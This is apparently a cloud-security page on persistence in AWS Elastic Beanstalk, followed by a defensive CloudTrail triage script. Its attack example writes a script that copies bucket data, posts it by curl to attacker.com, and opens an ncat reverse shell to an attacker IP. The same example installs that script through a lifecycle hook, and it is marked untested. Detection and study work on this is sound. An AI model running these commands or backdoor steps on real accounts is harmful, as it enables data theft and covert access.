To maintain persistence inside the AWS account, a persistence mechanism (cron job, SSH key...) can be introduced inside the instance so that the attacker can access it and steal the IAM role credentials from the metadata service.
Backdoor in Version
An attacker could backdoor the code inside the S3 repo so that it always executes the backdoor along with the expected code.
New Backdoored Version
Instead of changing the code in the actual version, the attacker could deploy a new backdoored version of the application.
Using Custom Resource Lifecycle Hooks
TODO: Test
Elastic Beanstalk provides lifecycle hooks that let you run custom scripts during instance provisioning and termination. An attacker could configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account.
```bash
# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
  AWSEBAutoScalingGroup:
    Metadata:
      AWS::ElasticBeanstalk::Ext:
        TriggerConfiguration:
          triggers:
            - name: stealthy-lifecycle-hook
              events:
                - "autoscaling:EC2_INSTANCE_LAUNCH"
                - "autoscaling:EC2_INSTANCE_TERMINATE"
              target:
                ref: "AWS::ElasticBeanstalk::Environment"
                arn:
                  Fn::GetAtt:
                    - "AWS::ElasticBeanstalk::Environment"
                    - "Arn"
  stealthyLifecycleHook:
    Type: AWS::AutoScaling::LifecycleHook
    Properties:
      AutoScalingGroupName:
        Ref: AWSEBAutoScalingGroup
      LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
      NotificationTargetARN:
        Ref: stealthy-lifecycle-hook
      RoleARN:
        Fn::GetAtt:
          - AWSEBAutoScalingGroup
          - Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
```
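From the defender's side, the three persistence paths above (a tampered source bundle in S3, a new application version, and a lifecycle hook or custom option pushed into the environment) each leave a control-plane event that can be triaged. The following is an added example, not code from the original page: the records, ARNs, bucket names and allow-lists are constructed, and the `requestParameters` field names are assumed to follow CloudTrail's usual camelCase.

```python
# Constructed CloudTrail-style records; ARNs, bucket names and allow-lists are
# hypothetical, and the requestParameters field names are assumed camelCase.
CI = "arn:aws:sts::111111111111:assumed-role/ci-deployer/build"
WEB = "arn:aws:sts::111111111111:assumed-role/eb-ec2-role/i-0abc"
BUNDLES = "elasticbeanstalk-us-east-1-111111111111"
DEPLOY_PRINCIPALS, TRUSTED_BUCKETS = {CI}, {BUNDLES}  # hypothetical allow-lists

def ev(service, name, arn, **params):
    return {"eventSource": service + ".amazonaws.com", "eventName": name,
            "userIdentity": {"arn": arn}, "requestParameters": params}

SAMPLE_EVENTS = [
    ev("elasticbeanstalk", "CreateApplicationVersion", CI, versionLabel="v42",
       sourceBundle={"s3Bucket": BUNDLES, "s3Key": "app/v42.zip"}),
    ev("s3", "PutObject", WEB, bucketName=BUNDLES, key="app/v42.zip"),
    ev("elasticbeanstalk", "CreateApplicationVersion", WEB, versionLabel="v43",
       sourceBundle={"s3Bucket": "unreviewed-bucket", "s3Key": "v43.zip"}),
    ev("elasticbeanstalk", "UpdateEnvironment", CI, environmentName="my-env",
       optionSettings=[{"namespace": "aws:elasticbeanstalk:customoption",
                        "optionName": "CustomConfigurationTemplate"}]),
    ev("autoscaling", "PutLifecycleHook", WEB, lifecycleHookName="hook",
       autoScalingGroupName="awseb-e-x-stack-AWSEBAutoScalingGroup-1A2B"),
]

def findings(event):
    api = (event.get("eventSource", "").split(".")[0], event.get("eventName", ""))
    p = event.get("requestParameters") or {}
    unexpected = event.get("userIdentity", {}).get("arn") not in DEPLOY_PRINCIPALS
    out = []
    if api == ("s3", "PutObject") and p.get("bucketName") in TRUSTED_BUCKETS and unexpected:
        out.append("source-bundle-overwritten")        # existing version tampered in S3
    if api[0] == "elasticbeanstalk" and api[1] in ("CreateApplicationVersion", "UpdateEnvironment"):
        if unexpected:
            out.append("deploy-by-unexpected-principal")
        bucket = (p.get("sourceBundle") or {}).get("s3Bucket")
        if bucket and bucket not in TRUSTED_BUCKETS:
            out.append("version-from-untrusted-bucket")  # new version from elsewhere
        if any(o.get("namespace") == "aws:elasticbeanstalk:customoption"
               for o in p.get("optionSettings") or []):
            out.append("custom-option-change")           # namespace used on this page
    if api == ("autoscaling", "PutLifecycleHook") and \
            "AWSEBAutoScalingGroup" in p.get("autoScalingGroupName", ""):
        out.append("lifecycle-hook-on-eb-asg")           # hook added outside a deploy
    return out

def triage(events):  # (eventName, findings) for every record that raised a finding
    return [(e["eventName"], f) for e in events if (f := findings(e))]

print(triage(SAMPLE_EVENTS))
```

The `PutObject` rule only fires if S3 data events are being logged for the bundle bucket; without them the overwrite of an existing version is not visible in CloudTrail.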